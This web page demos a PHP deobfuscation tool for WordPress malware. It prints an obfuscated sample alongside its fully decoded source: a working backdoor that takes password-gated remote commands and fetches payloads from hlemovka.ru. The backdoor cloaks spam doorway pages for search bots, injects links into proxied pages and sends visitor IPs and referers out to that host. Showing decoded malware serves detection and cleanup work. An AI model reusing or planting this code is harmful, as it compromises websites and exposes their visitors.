Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $WAoPYwyXdPvZ="SgEN0fTDKojbIWR_9hFBXt8L4q5leYP31MGsxn7CVZv6OkwmdiyQrpa2JzHuUAc";$TkOUzpvdclqLc=$WAoPYwyXdPvZ[11] .$WAoPYwyXdPvZ[54] .$WAoPYwyXdPvZ[35] . $WAoPYwyXdPvZ[28].
$WAoPYwyXdPvZ[43] .$WAoPYwyXdPvZ[24] .$WAoPYwyXdPvZ[15]. $WAoPYwyXdPvZ[48] .$WAoPYwyXdPvZ[28] .$WAoPYwyXdPvZ[62].$WAoPYwyXdPvZ[9] .$WAoPYwyXdPvZ[48].$WAoPYwyXdPvZ[28];$JgSqJBBslT=$WAoPYwyXdPvZ[35]. $WAoPYwyXdPvZ[21].
$WAoPYwyXdPvZ[52].$WAoPYwyXdPvZ[52] .$WAoPYwyXdPvZ[28] .$WAoPYwyXdPvZ[42];$MhvFSBZkQpnFJ=$WAoPYwyXdPvZ[28] .$WAoPYwyXdPvZ[52] .$WAoPYwyXdPvZ[52].
$WAoPYwyXdPvZ[9].$WAoPYwyXdPvZ[52] .$WAoPYwyXdPvZ[15] . $WAoPYwyXdPvZ[52].$WAoPYwyXdPvZ[28] .$WAoPYwyXdPvZ[53].
$WAoPYwyXdPvZ[9]. $WAoPYwyXdPvZ[52].
$WAoPYwyXdPvZ[21].$WAoPYwyXdPvZ[49]. $WAoPYwyXdPvZ[37].
$WAoPYwyXdPvZ[1];$sWaLnyOyEkszu=$WAoPYwyXdPvZ[62]. $WAoPYwyXdPvZ[52] . $WAoPYwyXdPvZ[28] .$WAoPYwyXdPvZ[54]. $WAoPYwyXdPvZ[21].$WAoPYwyXdPvZ[28]. $WAoPYwyXdPvZ[15] .$WAoPYwyXdPvZ[5]. $WAoPYwyXdPvZ[59]. $WAoPYwyXdPvZ[37]. $WAoPYwyXdPvZ[62] .$WAoPYwyXdPvZ[21].
$WAoPYwyXdPvZ[49].
$WAoPYwyXdPvZ[9] . $WAoPYwyXdPvZ[37];$MhvFSBZkQpnFJ(0);$EMsQnfRTJDs=$sWaLnyOyEkszu("",$TkOUzpvdclqLc($JgSqJBBslT("==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")));$EMsQnfRTJDs();?><?php
$WAoPYwyXdPvZ = "SgEN0fTDKojbIWR_9hFBXt8L4q5leYP31MGsxn7CVZv6OkwmdiyQrpa2JzHuUAc";
$TkOUzpvdclqLc = "base64_decode";
$JgSqJBBslT = "strrev";
$MhvFSBZkQpnFJ = "error_reporting";
$sWaLnyOyEkszu = "create_function";
error_reporting(0);
$EMsQnfRTJDs = function () {
set_time_limit(0);
function get_val($a0)
{
$i = @array_merge($_REQUEST, $_COOKIE, $_SERVER);
$a = isset($i["{$a0}"]) ? $i["{$a0}"] : (isset($i["HTTP_" . strtoupper($a0)]) ? $i["HTTP_" . strtoupper($a0)] : "");
return $a;
}
function change_page_regex($page, $links, $reg, $res)
{
$elements = array();
if (preg_match_all($reg, $page, $result)) {
$elements = $result[$res];
$elements = array_unique($elements);
}
$m = min(count($links), count($elements));
for ($i = 0; $i < $m; $i++) {
$link = array_shift($links);
$element = array_shift($elements);
$page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1);
}
if (count($links) > 0) {
$element = "<p>";
$element .= implode("<br>\n", $links);
$element .= "</p>";
$page = preg_replace('/\\<\\/body\\>/i', "\n" . $element . "\n\$0", $page, 1);
}
return $page;
}
function curly_page_get($url, $useragent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.1312.213 Safari/537.36")
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3000);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
$result = curl_exec($ch);
$curly_page_get_info = curl_getinfo($ch);
curl_close($ch);
return array($result, $curly_page_get_info);
}
function get_proxy_page($phead = 1)
{
$proto = stripos(@$_SERVER['SERVER_PROTOCOL'], 'https') === true ? 'https://' : 'http://';
$crurl = $proto . @$_SERVER['HTTP_HOST'] . @$_SERVER['REQUEST_URI'];
list($buf, $curly_page_get_info) = curly_page_get($crurl);
$ct = @$curly_page_get_info['content_type'];
$nexturl = @$curly_page_get_info['redirect_url'];
$status = @$curly_page_get_info['http_code'];
if (true) {
header("Status: {$status}");
}
if ($phead) {
header("X-CF-RAYX: " . substr(md5(time()), 0, 10));
}
if ($ct != "") {
header("Content-type: {$ct}");
}
if ($nexturl != "") {
header("Location: {$nexturl}");
}
return array($buf, $ct);
}
function get_db_path()
{
if (stristr(PHP_OS, "win")) {
return sys_get_temp_dir();
}
$default_dirs = array('wp-includes/SimplePie/Content', 'wp-includes/js/tinymce/plugins', 'wp-content/plugins/akismet/_inc/img', 'administrator/components/com_media/views/images', 'libraries/cms/html/language', 'media/editors/tinymce/js/plugins', 'tmp', 'wp-content/uploads');
foreach ($default_dirs as $d) {
if (is_dir($d) && is_writable($d)) {
return $d;
}
}
$current_dir = opendir('.');
while ($dir = readdir($current_dir)) {
if (!preg_match('/^\\.+$/', $dir) && is_dir($dir) && is_writable($dir)) {
return $dir;
}
}
closedir($current_dir);
if (is_writable('.')) {
return '.';
}
$tmp_dir = sys_get_temp_dir();
if (is_dir($tmp_dir) && is_writable($tmp_dir)) {
return $tmp_dir;
}
return ".";
}
$content = "";
$x = get_val("pppp_check");
$md5pass = "e5e4570182820af0a183ce1520afe43b";
$host = strtolower(@$_SERVER["HTTP_HOST"]);
$uri = @$_SERVER["REQUEST_URI"];
$host = str_replace("www.", "", $host);
$md5host = md5($host);
$urx = $host . $uri;
$md5urx = md5($urx);
$xmd5 = "/." . $md5host . "/";
$cfile = "emoji1.png";
if (!@file_exists("." . $xmd5 . $cfile)) {
$tmppath = get_db_path();
} else {
$tmppath = ".";
}
$tmppath .= $xmd5;
@mkdir($tmppath);
$configs = $tmppath . $cfile;
$bd = $tmppath . "metaicons.jpg";
$templ = $tmppath . "wp-themesall.gif";
$domain = "hlemovka.ru";
$p = "";
if ($x != "") {
$p = md5(@base64_decode(get_val("p")));
}
if ($x != "" && $p == $md5pass) {
if ($x == "2") {
echo "###UPDATING_FILES###\n";
$ur = "http://" . $domain . "/images/" . $md5host . "/";
list($buf1, $t) = @curly_page_get($ur . "emoji1.png");
@file_put_contents($configs, $buf1);
list($buf1, $t) = @curly_page_get($ur . "metaicons.jpg");
@file_put_contents($bd, $buf1);
list($buf1, $t) = @curly_page_get($ur . "wp-themesall.gif");
@file_put_contents($templ, $buf1);
echo "###UPDATED###\n";
exit;
}
if ($x == "4") {
echo "###WORKED###\n";
exit;
}
if ($x == "5") {
$cf = array();
if (@file_exists($configs)) {
$cf = @unserialize(@base64_decode(@file_get_contents($configs)));
}
$out = array('cf' => $cf, 'server' => $_SERVER, 'file' => "/var/www/html/input.php", 'configfile' => $configs, 'db_file_size' => is_file($bd) ? filesize($bd) : 0, 'template_file_size' => is_file($templ) ? filesize($templ) : 0);
echo base64_encode(serialize($out));
exit;
}
} else {
$cf = array();
if (@file_exists($configs)) {
$cf = @unserialize(@base64_decode(@file_get_contents($configs)));
}
if (@isset($cf[$md5urx])) {
$bot = 0;
$se = 0;
$ua = @$_SERVER["HTTP_USER_AGENT"];
$ref = @$_SERVER["HTTP_REFERER"];
$myip = @$_SERVER["REMOTE_ADDR"];
if (preg_match("#google|bing\\.com|msn\\.com|ask\\.com|aol\\.com|altavista|search|yahoo|conduit\\.com|charter\\.net|wow\\.com|mywebsearch\\.com|handycafe\\.com|babylon\\.com#i", $ref)) {
$se = 1;
}
if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\\.ru|crawler|baiduspider#i", $ua)) {
$bot = 1;
}
$off = $cf[$md5urx] + 0;
$template = @base64_decode(@file_get_contents($templ));
$f = @fopen($bd, "r");
@fseek($f, $off);
$buf = trim(@fgets($f));
@fclose($f);
$info = unserialize(base64_decode($buf));
$keyword = @$info["keyword"];
$IDpack = @$info["IDpack"];
$base = @$info["base"];
$text = @$info["text"];
$title = @$info["title"];
$description = @$info["description"];
$uckeyword = ucwords($keyword);
$inside_links = @$info["inside_links"];
if ($bot) {
if (isset($info["contenttype"])) {
$contenttype = @base64_decode($info["contenttype"]);
$types = explode("\n", $contenttype);
foreach ($types as $val) {
$val = trim($val);
if ($val != "") {
header($val);
}
}
}
if (isset($info["isdoor"])) {
if (isset($info["standalone"])) {
$doorcontent = base64_decode($text);
echo $doorcontent;
exit;
} else {
if (isset($info["nr"]) && is_array($info["nr"])) {
foreach ($info["nr"] as $mark => $repl) {
$template = str_replace($mark, $repl, $template);
}
} else {
$template = str_replace("%text%", $text, $template);
$template = str_replace("%title%", $title, $template);
$template = str_replace("%description%", $description, $template);
$template = str_replace("%uckeyword%", $uckeyword, $template);
$template = str_replace("%keyword%", str_replace(" ", ",", trim($keyword)), $template);
foreach ($inside_links as $i => $link) {
$template = str_replace("%INSIDE_LINK_" . $i . "%", $link, $template);
}
}
echo $template;
exit;
}
} else {
list($buf, $ct) = get_proxy_page();
if (stristr($ct, "text/html")) {
$rega = '/\\<a\\s.*?\\>.*?\\<\\/a\\>/i';
$resa = 0;
$links = $info["links_a"];
$buf = change_page_regex($buf, $links, $rega, $resa);
$regp = '/(.{30}\\<\\/p\\>)/is';
$resp = 1;
$links = $info["links_p"];
$buf = change_page_regex($buf, $links, $regp, $resp);
}
echo $buf;
exit;
}
}
if ($se) {
if (isset($info["isdoor"])) {
list($buf, $curly_page_get_info) = curly_page_get("http://{$domain}/ff.php?ip=" . $IDpack . "&mk=" . rawurlencode($keyword) . "&base=" . rawurlencode($base) . "&d=" . rawurlencode($host) . "&u=" . rawurlencode($urx) . "&addr=" . $myip . "&ref=" . rawurlencode($ref), $ua);
} else {
list($buf, $ct) = get_proxy_page();
}
echo $buf;
exit;
}
} else {
list($buf, $ct) = get_proxy_page();
echo $buf;
exit;
}
}
};
$EMsQnfRTJDs();Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.